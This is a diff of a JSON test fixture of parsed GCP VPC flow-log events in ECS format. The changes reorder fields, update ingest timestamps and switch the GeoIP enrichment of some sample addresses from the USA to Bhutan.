@@ -18108,25 +19029,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 91 + "ms": 36 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392171800Z", - "original": "{\"insertId\":\"19im82tfdygzo1\",\"jsonPayload\":{\"bytes_sent\":\"181624065\",\"connection\":{\"dest_ip\":\"10.49.136.133\",\"dest_port\":52780,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":9243},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:58.592579489Z\",\"packets_sent\":\"28344\",\"reporter\":\"DEST\",\"rtt_msec\":\"91\",\"src_location\":{\"asn\":16509,\"city\":\"Boardman\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Oregon\"},\"start_time\":\"2019-06-14T03:40:17.183499423Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:17.183499423Z", - "end": "2019-06-14T03:49:58.592579489Z", - "id": "19im82tfdygzo1", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, 
@@ -18147,6 +19053,16 @@ "ip": "192.168.2.117", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415269200Z", + "original": "{\"insertId\":\"19im82tfdygzo8\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":51348},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:20.754300982Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:20.630975303Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "kind": "event", + "start": "2019-06-14T03:41:20.630975303Z", + "end": "2019-06-14T03:41:20.754300982Z", + "id": "19im82tfdygzo8", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -18158,19 +19074,27 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.553Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "192.168.2.117", - "10.87.40.76" + "10.73.186.17", + "192.168.2.12" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC" + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -18181,29 +19105,8 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392177300Z", - "original": "{\"insertId\":\"19im82tfdygzo8\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":51348},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:20.754300982Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:20.630975303Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", - "kind": "event", - "start": "2019-06-14T03:41:20.630975303Z", - "end": "2019-06-14T03:41:20.754300982Z", - "id": "19im82tfdygzo8", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { "continent_name": "Asia", 
@@ -18226,47 +19129,8 @@ "domain": "infraops-docker-data", "ip": "10.73.186.17" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:I5lhpPeiyo7KchAzF1nMGZkwF4k=", - "bytes": 0, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 1, - "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:17.553Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.73.186.17", - "192.168.2.12" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC" - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, "event": { - "ingested": "2021-12-09T13:37:46.392182800Z", + "ingested": "2021-12-14T14:43:27.415269594Z", "original": "{\"insertId\":\"19im82tfdygzoa\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"192.168.2.12\",\"dest_port\":44128,\"protocol\":6,\"src_ip\":\"10.73.186.17\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Binzhou\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Shandong\"},\"end_time\":\"2019-06-14T03:45:22.081121292Z\",\"packets_sent\":\"1\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:22.080963433Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": 
"2019-06-14T03:45:22.080963433Z", @@ -18274,6 +19138,18 @@ "id": "19im82tfdygzoa", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:I5lhpPeiyo7KchAzF1nMGZkwF4k=", + "bytes": 0, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 1, + "direction": "outbound" } }, { @@ -18282,11 +19158,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -18364,7 +19245,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392188500Z", + "ingested": "2021-12-14T14:43:27.415270033Z", "original": "{\"insertId\":\"19im82tfdygzn7\",\"jsonPayload\":{\"bytes_sent\":\"11137\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33968},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.965294083Z\",\"packets_sent\":\"95\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.480272197Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.480272197Z", 
@@ -18375,41 +19256,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.14", - "port": 54812, - "ip": "67.43.156.14" - }, - "source": { - "address": "10.87.40.76", - "port": 5601, - "bytes": 1776, - "packets": 7, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:7gePYXWz+/zKghVHNYgmCfG2ZOE=", - "bytes": 1776, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:17.553Z", "ecs": { "version": "1.12.0" @@ -18420,6 +19266,9 @@ "67.43.156.14" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", 
@@ -18440,8 +19289,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 54812, + "ip": "67.43.156.14" + }, + "source": { + "address": "10.87.40.76", + "port": 5601, + "bytes": 1776, + "packets": 7, + "domain": "kibana", + "ip": "10.87.40.76" + }, "event": { - "ingested": "2021-12-09T13:37:46.392194Z", + "ingested": "2021-12-14T14:43:27.415270427Z", "original": "{\"insertId\":\"19im82tfdygznf\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":54812,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:45:20.708994883Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:20.595119257Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:45:20.595119257Z", 
@@ -18449,6 +19323,18 @@ "id": "19im82tfdygznf", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:7gePYXWz+/zKghVHNYgmCfG2ZOE=", + "bytes": 1776, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "outbound" } }, { @@ -18457,11 +19343,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33564, 
@@ -18539,7 +19430,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392199500Z", + "ingested": "2021-12-14T14:43:27.415270824Z", "original": "{\"insertId\":\"19im82tfdygzni\",\"jsonPayload\":{\"bytes_sent\":\"21792\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33564,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597079770Z\",\"packets_sent\":\"186\",\"reporter\":\"SRC\",\"rtt_msec\":\"340\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.866944869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.866944869Z", 
@@ -18550,43 +19441,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" - }, - "as": { - "number": 33652 - }, - "address": "67.43.156.13", - "port": 49438, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.139.99.242", - "port": 9200, - "bytes": 74370, - "packets": 580, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:Wx9CFh/CGkJ8gWbPZ6ib0K8z+zk=", - "bytes": 74370, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 580, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:17.553Z", "ecs": { "version": "1.12.0" @@ -18597,6 +19451,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", 
@@ -18617,8 +19474,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 49438, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.139.99.242", + "port": 9200, + "bytes": 74370, + "packets": 580, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, "event": { - "ingested": "2021-12-09T13:37:46.392205Z", + "ingested": "2021-12-14T14:43:27.415271211Z", "original": "{\"insertId\":\"19im82tfdygzns\",\"jsonPayload\":{\"bytes_sent\":\"74370\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":49438,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220725956Z\",\"packets_sent\":\"580\",\"reporter\":\"SRC\",\"rtt_msec\":\"114\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.398463104Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.398463104Z", 
@@ -18626,6 +19508,18 @@ "id": "19im82tfdygzns", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:Wx9CFh/CGkJ8gWbPZ6ib0K8z+zk=", + "bytes": 74370, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 580, + "direction": "outbound" } }, { @@ -18640,11 +19534,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -18716,7 +19615,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392210600Z", + "ingested": "2021-12-14T14:43:27.415271703Z", "original": "{\"insertId\":\"19im82tfdygznp\",\"jsonPayload\":{\"bytes_sent\":\"138337\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33550,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"244\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", 
@@ -18814,7 +19713,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392216100Z", + "ingested": "2021-12-14T14:43:27.415272099Z", "original": "{\"insertId\":\"19im82tfdygzo9\",\"jsonPayload\":{\"bytes_sent\":\"30062\",\"connection\":{\"dest_ip\":\"192.168.2.177\",\"dest_port\":60110,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:46.020466750Z\",\"packets_sent\":\"124\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:10.874529937Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:10.874529937Z", 
@@ -18825,41 +19724,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "192.168.2.117", - "port": 51348, - "ip": "192.168.2.117" - }, - "source": { - "address": "10.87.40.76", - "port": 5601, - "bytes": 1781, - "packets": 7, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:ALoeGJMuIEHJKbowB+FYTqIV3pc=", - "bytes": 1781, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:17.553Z", "ecs": { "version": "1.12.0" @@ -18870,6 +19734,9 @@ "192.168.2.117" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", 
@@ -18890,21 +19757,6 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392221900Z", - "original": "{\"insertId\":\"19im82tfdygzo3\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":51348,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:20.754300982Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:20.630975303Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", - "kind": "event", - "start": "2019-06-14T03:41:20.630975303Z", - "end": "2019-06-14T03:41:20.754300982Z", - "id": "19im82tfdygzo3", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { "continent_name": "America", 
@@ -18913,15 +19765,67 @@ "as": { "number": 15169 }, - "address": "67.43.156.13", - "port": 33560, - "domain": "kibana", - "ip": "67.43.156.13" + "address": "192.168.2.117", + "port": 51348, + "ip": "192.168.2.117" }, "source": { - "address": "10.139.99.242", - "port": 9200, - "bytes": 152218, + "address": "10.87.40.76", + "port": 5601, + "bytes": 1781, + "packets": 7, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "event": { + "ingested": "2021-12-14T14:43:27.415272514Z", + "original": "{\"insertId\":\"19im82tfdygzo3\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":51348,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:20.754300982Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:20.630975303Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "kind": "event", + "start": "2019-06-14T03:41:20.630975303Z", + "end": "2019-06-14T03:41:20.754300982Z", + "id": "19im82tfdygzo3", + "category": "network", + "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:ALoeGJMuIEHJKbowB+FYTqIV3pc=", + "bytes": 1781, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "outbound" + } + }, + { + 
"log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 33560, + "domain": "kibana", + "ip": "67.43.156.13" + }, + "source": { + "address": "10.139.99.242", + "port": 9200, + "bytes": 152218, "packets": 243, "domain": "elasticsearch", "ip": "10.139.99.242" 
@@ -18989,7 +19893,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392232200Z", + "ingested": "2021-12-14T14:43:27.415273336Z", "original": "{\"insertId\":\"19im82tfdygznz\",\"jsonPayload\":{\"bytes_sent\":\"152218\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33560,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565026127Z\",\"packets_sent\":\"243\",\"reporter\":\"SRC\",\"rtt_msec\":\"116\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.076060079Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.076060079Z", @@ -19005,11 +19909,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33510, 
